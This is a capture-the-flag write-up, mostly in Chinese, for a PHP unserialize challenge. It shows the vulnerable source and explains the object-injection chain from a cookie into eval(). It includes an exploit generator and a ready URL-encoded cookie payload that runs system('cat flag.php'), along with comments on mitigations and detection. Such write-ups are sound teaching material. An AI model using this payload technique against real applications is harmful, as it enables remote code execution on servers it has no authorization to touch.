ez_unserialize
Analyze
先上题:
<?php
// error_reporting(0) silences every warning and notice, including those a malformed
// or unexpected serialized payload would otherwise raise during unserialize();
// highlight_file() deliberately discloses this source to the visitor (challenge setup).
error_reporting(0); highlight_file(__FILE__);
/**
 * Challenge target. Instances are rebuilt from the `user` cookie by unserialize()
 * (see the top-level code below), so every property here -- including the
 * object stored in $class -- is chosen by the client, not by this constructor.
 */
class User{
    private $username='name';
    private $password='password';
    // Set to an info instance by __construct; unserialize() never invokes
    // __construct, so after deserialization this holds whatever the cookie carried.
    private $class = 'info';
    public function __construct(){ $this->class=new info(); }
    // Strict comparison against the hard-coded defaults; not involved in the bug.
    public function login($u,$p){ if($this->username===$u&&$this->password===$p){ echo "successfully login"; } }
    // Trigger: getInfo() is invoked on $class without checking its runtime type,
    // so any deserialized class that defines getInfo() is reachable when the
    // object is destroyed. Mitigation: guard with `$this->class instanceof info`,
    // restrict unserialize() via `allowed_classes`, or avoid unserialize() on
    // user-supplied data entirely (e.g. use JSON).
    public function __destruct(){ $this->class->getInfo(); }
}
/**
 * Benign holder that User is meant to wrap: getInfo() just returns the stored string.
 */
class info
{
    private $user = 'xxxxxx';

    public function getInfo()
    {
        return $this->user;
    }
}
/**
 * Gadget class: getInfo() hands $code to eval(). $code is private and never
 * assigned anywhere in the visible source, so it can only be populated through
 * unserialize(); the class exists solely so that User::__destruct() has something
 * dangerous to call. Detection note: a legitimate cookie never contains a
 * serialized `evil` object (`O:4:"evil"`), so its presence is a clear signal to
 * reject the input or alert on it.
 */
class evil{
    private $code;
    // Executes whatever string the deserialized object carries -- the RCE sink.
    public function getInfo(){ eval($this->code); }
}
$username=$_GET['username']; $password=$_GET['password'];
// Injection point: the `user` cookie is passed straight to unserialize(), so the
// client decides which class is instantiated and what its properties contain.
// Mitigation: `unserialize($_COOKIE['user'], ['allowed_classes' => ['User', 'info']])`
// limits the classes that can be restored; better still, carry the state as JSON.
// Note that both GET parameters must be present for unserialize() to be reached at all.
if(isset($username) && isset($password)){ $user = unserialize($_COOKIE['user']); $user->login($username,$password); }
先找到反序列化的地方 `$user = unserialize($_COOKIE['user']);`，所以是对 user 进行 cookie 注入，可以使用 cookie editor 等插件。
观察到 evil 类中有 eval() 函数，其作用是将字符串参数当做代码来执行，所以可以在这里进行攻击。
User 类的构造函数会生成一个新的对象，所以可以在这里改为 `$this->class=new evil();`。这样本地 `new User()` 后再 serialize，class 属性里带的就是 evil 对象；目标端反序列化不会调用构造函数，但会还原该属性，并在 `__destruct` 中调用它的 getInfo()，从而进入 eval()。
EXP
<?php
// Payload generator, intended to be run locally rather than on the target;
// warnings are silenced exactly as in the original source.
error_reporting(0);
/**
 * Copy of the target's User class with the constructor changed to embed an evil
 * instance instead of info. Property names and visibility must match the target's
 * declarations, because they determine the serialized keys (the `\0User\0username`
 * style private-property names visible in the encoded output below).
 */
class User{
    private $username='name';
    private $password='password';
    private $class;
    // Only difference from the target: the nested object is the eval gadget.
    public function __construct(){ $this->class=new evil(); }
    public function login($u,$p){ if($this->username===$u&&$this->password===$p){ echo "successfully login"; } }
    // Kept so the class shape matches; it also means the destructor runs locally
    // when the script ends, executing the embedded code on the generating machine too.
    public function __destruct(){ $this->class->getInfo(); }
}
/**
 * Retained from the target source for completeness; nothing in this generator
 * instantiates it (the constructor above builds an evil instead).
 */
class info
{
    private $user = 'xxxxxx';

    public function getInfo()
    {
        return $this->user;
    }
}
/**
 * Gadget carried inside the serialized User: $code is the string the target's
 * eval() runs when User::__destruct() calls getInfo(). The default value here is
 * what lands in the cookie (the `s:23:"system('cat flag.php');"` segment of the
 * encoded output below).
 */
class evil{
    private $code="system('cat flag.php');";
    public function getInfo(){ eval($this->code); }
}
// Carried over from the target source. When the generator runs without GET
// parameters the isset() check fails and this branch is skipped, so no cookie
// lookup or login() call happens here.
$username=$_GET['username']; $password=$_GET['password'];
if(isset($username) && isset($password)){ $user = unserialize($_COOKIE['user']); $user->login($username,$password); }
// Build the object graph and print it URL-encoded so it can be pasted into the cookie as-is.
$payload = new User();
echo urlencode(serialize($payload));
?>
user=O%3A4%3A%22User%22%3A3%3A%7Bs%3A14%3A%22%00User%00username%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A%22%00User%00password%22%3Bs%3A8%3A%22password%22%3Bs%3A11%3A%22%00User%00class%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D /?username=name&password=password
即可得到flag